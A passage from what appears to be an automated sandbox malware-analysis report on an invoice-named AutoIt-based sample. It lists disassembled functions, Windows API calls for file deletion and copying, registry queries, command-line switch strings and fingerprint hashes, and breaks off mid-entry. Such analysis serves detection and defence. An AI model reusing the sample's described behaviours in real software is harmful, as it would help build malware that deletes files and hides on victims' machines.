                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                          • Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
                                          • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                          • Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F
                                          Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                          • timeGetTime.WINMM ref: 00410D16
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                          • Sleep.KERNEL32(0000000A), ref: 00410E61
                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                          • DestroyWindow.USER32 ref: 00410F06
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                          • TranslateMessage.USER32(?), ref: 00445C60
                                          • DispatchMessageW.USER32(?), ref: 00445C6E
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                          • API String ID: 4212290369-1082885916
                                          • Opcode ID: 8c862c1adef0dd174fd2be55be65c9d74d6103239cf7f684fe8d594734bcf318
                                          • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                                          • Opcode Fuzzy Hash: 8c862c1adef0dd174fd2be55be65c9d74d6103239cf7f684fe8d594734bcf318
                                          • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                                          Function 00BA8550 Relevance: 21.5, APIs: 14, Instructions: 544COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorFreeLast
                                          • String ID:
                                          • API String ID: 1762890227-0
                                          • Opcode ID: 107337f4b2561ade14b97fb3fdb6340e6d6d936569fc35746c87d3143ac3ad3e
                                          • Instruction ID: eafe17e6b45ba203a3060a4539131b6c5afb0e2f6a7e900b78ad195398c31245
                                          • Opcode Fuzzy Hash: 107337f4b2561ade14b97fb3fdb6340e6d6d936569fc35746c87d3143ac3ad3e
                                          • Instruction Fuzzy Hash: A9F1377194C3809ECF3657284C48B363AE4EB77770F5C06EAE491D6CF2EE658D089266
                                          Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1132 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1145 46920b-469212 call 469734 1132->1145 1146 4692b8-4692bf call 469734 1132->1146 1151 4692c1-4692c3 1145->1151 1152 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1145->1152 1146->1151 1153 4692c8 1146->1153 1154 46952a-46952b 1151->1154 1156 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1152->1156 1153->1156 1157 469548-469558 call 405211 1154->1157 1191 469390-4693ab call 468fa5 1156->1191 1192 469389-46938b 1156->1192 1195 4693b1-4693b9 1191->1195 1196 46943d-469449 call 4253a6 1191->1196 1192->1154 1197 4693c1 1195->1197 1198 4693bb-4693bf 1195->1198 1203 46945f-469463 1196->1203 1204 46944b-46945a DeleteFileW 1196->1204 1200 4693c6-4693e4 call 404f0b 1197->1200 1198->1200 1210 4693e6-4693eb 1200->1210 1211 46940e-469424 call 468953 call 424863 1200->1211 1206 469505-469519 CopyFileW 1203->1206 1207 469469-4694f2 call 4240bb call 4699ea call 468b06 1203->1207 1204->1154 1208 46952d-469543 DeleteFileW call 4698a2 1206->1208 1209 46951b-469528 DeleteFileW 1206->1209 1207->1208 1228 4694f4-469503 DeleteFileW 1207->1228 1208->1157 1209->1154 1215 4693ee-469401 call 4690dd 1210->1215 1224 469429-469434 1211->1224 1225 469403-46940c 1215->1225 1224->1195 1227 46943a 1224->1227 1225->1211 1227->1196 1228->1154
                                          APIs
                                            • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                                            • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                          • __wsplitpath.LIBCMT ref: 00469234
                                            • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                                          • _wcscpy.LIBCMT ref: 00469247
                                          • _wcscat.LIBCMT ref: 0046925A
                                          • __wsplitpath.LIBCMT ref: 0046927F
                                          • _wcscat.LIBCMT ref: 00469295
                                          • _wcscat.LIBCMT ref: 004692A8
                                            • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                                            • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                                          • _wcscmp.LIBCMT ref: 004691EF
                                            • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                            • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                                          • _wcsncpy.LIBCMT ref: 004694C5
                                          • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: dafe4648b5bbac87b0fd5884d323520927b6c8dc5856a1245f48faeb858b36b7
                                          • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                                          • Opcode Fuzzy Hash: dafe4648b5bbac87b0fd5884d323520927b6c8dc5856a1245f48faeb858b36b7
                                          • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69
                                          Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                          • RegisterClassExW.USER32(00000030), ref: 0040309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                          • LoadIconW.USER32(000000A9), ref: 004030F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                          • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                                          • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                                          • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69
                                          Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                          • RegisterClassExW.USER32(00000030), ref: 0040309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                          • LoadIconW.USER32(000000A9), ref: 004030F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                          • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                                          • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                                          • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9
                                          Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1298 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1315 43e8b1-43e8cc RegQueryValueExW 1298->1315 1316 4071b6-4071d3 call 405904 * 2 1298->1316 1318 43e943-43e94f RegCloseKey 1315->1318 1319 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1315->1319 1318->1316 1321 43e955-43e959 1318->1321 1331 43e92b-43e931 1319->1331 1332 43e90f-43e929 call 407bcc 1319->1332 1324 43e95e-43e984 call 4079f2 * 2 1321->1324 1338 43e986-43e994 call 4079f2 1324->1338 1339 43e9a9-43e9b6 call 422bfc 1324->1339 1336 43e933-43e940 call 420e2c * 2 1331->1336 1337 43e941 1331->1337 1332->1331 1336->1337 1337->1318 1338->1339 1348 43e996-43e9a7 call 422d8d 1338->1348 1350 43e9b8-43e9c9 call 422bfc 1339->1350 1351 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1339->1351 1359 43ea1c-43ea1d 1348->1359 1350->1351 1360 43e9cb-43e9db call 422d8d 1350->1360 1351->1316 1351->1359 1359->1324 1360->1351
                                          APIs
                                            • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                                            • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                          • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                          • _wcscat.LIBCMT ref: 0043E9A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: a6d0115487cac6cdb78e914e361494f58dec76b172a5a3d65aa719fa9822dcc2
                                          • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                          • Opcode Fuzzy Hash: a6d0115487cac6cdb78e914e361494f58dec76b172a5a3d65aa719fa9822dcc2
                                          • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A
                                          Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1368 403633-403681 1370 4036e1-4036e3 1368->1370 1371 403683-403686 1368->1371 1370->1371 1374 4036e5 1370->1374 1372 4036e7 1371->1372 1373 403688-40368f 1371->1373 1378 4036ed-4036f0 1372->1378 1379 43d0cc-43d0fa call 411070 call 411093 1372->1379 1375 403695-40369a 1373->1375 1376 40374b-403753 PostQuitMessage 1373->1376 1377 4036ca-4036d2 DefWindowProcW 1374->1377 1381 4036a0-4036a2 1375->1381 1382 43d154-43d168 call 462527 1375->1382 1383 403711-403713 1376->1383 1384 4036d8-4036de 1377->1384 1385 4036f2-4036f3 1378->1385 1386 403715-40373c SetTimer RegisterWindowMessageW 1378->1386 1413 43d0ff-43d106 1379->1413 1388 403755-40375f call 4044a0 1381->1388 1389 4036a8-4036ad 1381->1389 1382->1383 1406 43d16e 1382->1406 1383->1384 1392 4036f9-40370c KillTimer call 40443a call 403114 1385->1392 1393 43d06f-43d072 1385->1393 1386->1383 1390 40373e-403749 CreatePopupMenu 1386->1390 1407 403764 1388->1407 1395 4036b3-4036b8 1389->1395 1396 43d139-43d140 1389->1396 1390->1383 1392->1383 1399 43d074-43d076 1393->1399 1400 43d0a8-43d0c7 MoveWindow 1393->1400 1404 43d124-43d134 call 462d36 1395->1404 1405 4036be-4036c4 1395->1405 1396->1377 1402 43d146-43d14f call 457c36 1396->1402 1408 43d097-43d0a3 SetFocus 1399->1408 1409 43d078-43d07b 1399->1409 1400->1383 1402->1377 1404->1383 1405->1377 1405->1413 1406->1377 1407->1383 1408->1383 1409->1405 1414 43d081-43d092 call 411070 1409->1414 1413->1377 1417 43d10c-43d11f call 40443a call 40434a 1413->1417 1414->1383 1417->1377
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                          • KillTimer.USER32(?,00000001), ref: 004036FC
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                          • CreatePopupMenu.USER32 ref: 0040373E
                                          • PostQuitMessage.USER32(00000000), ref: 0040374D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated$%I
                                          • API String ID: 129472671-1195164674
                                          • Opcode ID: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
                                          • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                          • Opcode Fuzzy Hash: d085891fbce4ac700e19f77706549dbb7e8c65c9ecaa69f5eff41dbd37e5b37c
                                          • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E
                                          Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                          • LoadIconW.USER32(00000063), ref: 00403A76
                                          • LoadIconW.USER32(000000A4), ref: 00403A88
                                          • LoadIconW.USER32(000000A2), ref: 00403A9A
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                          • RegisterClassExW.USER32(?), ref: 00403B16
                                            • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                            • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                            • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                            • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                            • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                            • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                            • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                          • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                          • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                          • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                          Function 00B8CE90 Relevance: 16.2, APIs: 10, Instructions: 1204COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1341114141.0000000000B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_b80000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06bc54eb2d9f9ee961d034c76a270615f835743abaeff911c3c0ae3b53704266
                                          • Instruction ID: d829bda29f59ac4724cfd878eb953ba4df45887dbe710049cc6e0dea31cab199
                                          • Opcode Fuzzy Hash: 06bc54eb2d9f9ee961d034c76a270615f835743abaeff911c3c0ae3b53704266
                                          • Instruction Fuzzy Hash: 55A27B7190D3808FC735EB18C8447AABBE1EFD5318F09499AE598972B2D735AC04CB97
                                          Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                          • API String ID: 1825951767-3937808951
                                          • Opcode ID: bf729bc036ab1e3317ed16226f5a6ba2ab3dbb3ff9daeb18d2562a5e898344aa
                                          • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                          • Opcode Fuzzy Hash: bf729bc036ab1e3317ed16226f5a6ba2ab3dbb3ff9daeb18d2562a5e898344aa
                                          • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
                                          Function 00E9E260 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
